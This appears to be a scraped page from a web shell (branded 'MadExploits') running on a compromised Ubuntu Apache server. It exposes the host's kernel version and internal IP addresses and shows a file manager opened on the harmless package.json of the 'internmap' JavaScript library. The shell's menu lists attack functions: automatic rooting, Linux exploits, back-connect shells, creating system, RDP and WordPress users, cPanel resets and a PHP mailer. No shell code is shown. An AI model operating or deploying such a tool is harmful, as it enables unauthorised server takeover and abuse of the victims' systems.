Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
internmap /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
LICENSE
726
B
-rw-r--r--
README.md
3.59
KB
-rw-r--r--
package.json
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "internmap", "version": "2.0.3", "description": "Map and Set with automatic key interning", "homepage": "https://github.com/mbostock/internmap/", "license": "ISC", "author": { "name": "Mike Bostock", "url": "https://bost.ocks.org/mike" }, "type": "module", "main": "src/index.js", "module": "src/index.js", "jsdelivr": "dist/internmap.min.js", "unpkg": "dist/internmap.min.js", "exports": { "umd": "./dist/internmap.min.js", "default": "./src/index.js" }, "repository": { "type": "git", "url": "https://github.com/mbostock/internmap.git" }, "files": [ "dist/**/*.js", "src/**/*.js" ], "scripts": { "test": "mocha 'test/**/*-test.js' && eslint src test", "prepublishOnly": "rm -rf dist && yarn test && rollup -c", "postpublish": "git push && git push --tags" }, "sideEffects": false, "devDependencies": { "eslint": "^7.32.0", "mocha": "^9.1.1", "rollup": "^2.56.3", "rollup-plugin-terser": "^7.0.2" }, "engines": { "node": ">=12" } }
Close